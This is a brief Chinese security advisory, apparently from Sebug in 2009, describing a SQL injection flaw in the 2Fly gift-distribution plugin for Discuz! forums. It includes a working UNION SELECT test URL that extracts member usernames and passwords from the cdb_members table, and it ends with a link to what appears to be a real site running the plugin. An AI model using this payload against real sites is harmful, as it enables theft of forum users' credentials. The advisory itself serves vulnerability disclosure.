Discuz!账号发放插件注入漏洞
2009年9月20日星期日 | | |影响版本:
V1.1.1漏洞描述:
2Fly礼品(序号)发放系统
本插件可用于发布任何实物礼品、文字项目、序列号、帐号、推广等多方面应用。 存在过滤不严的问题。<*参考
http://www.hacksb.cn/post/59.html
*>
测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
http://www.xxx.com/2fly_gift.php?pages=content&gameid=16 and 1=2 union select 1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from cdb_membersSEBUG安全建议:
暂无
http://www.lanrengu.cn/lrbbs/2fly_Works.php// sebug.net
博文
